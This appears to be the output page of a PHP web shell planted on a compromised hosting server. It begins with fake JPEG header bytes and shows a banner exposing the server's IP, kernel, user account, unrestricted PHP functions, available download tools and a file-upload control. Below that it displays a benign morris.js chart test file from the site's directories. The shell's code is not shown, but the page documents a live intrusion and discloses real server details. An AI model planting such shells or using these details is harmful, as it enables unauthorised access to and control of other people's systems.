����JFIF��x�x����'
Server IP : 66.29.137.217 / Your IP : 18.116.49.6 Web Server : LiteSpeed System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : gltevjme ( 1095) PHP Version : 7.0.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/gltevjme/ideyshare.name.ng/app/assets/admin/vendors/morris.js/spec/viz/ |
Upload File : |
<!doctype html> <head> <!-- jQuery packaging changed for 2.1.0, so try to load both paths, one will work. --> <script src="../../bower_components/jquery/dist/jquery.js"></script> <script src="../../bower_components/jquery/jquery.js"></script> <script src="../../bower_components/raphael/raphael-min.js"></script> <script src="../../morris.js"></script> <link rel="stylesheet" href="../../morris.css"> <style> body { padding: 0; margin: 0; background-color: white; } #chart { width: 500px; height: 300px; } </style> <script> function bridge(e) { window.alert(JSON.stringify(e)); } window.snapshot = function () { bridge({ fn: "snapshot" }); }; window.mousemove = function (x, y) { bridge({ fn: "mousemove", x: x, y: y }); }; </script> </head> <body> <div id="chart"></div> </body>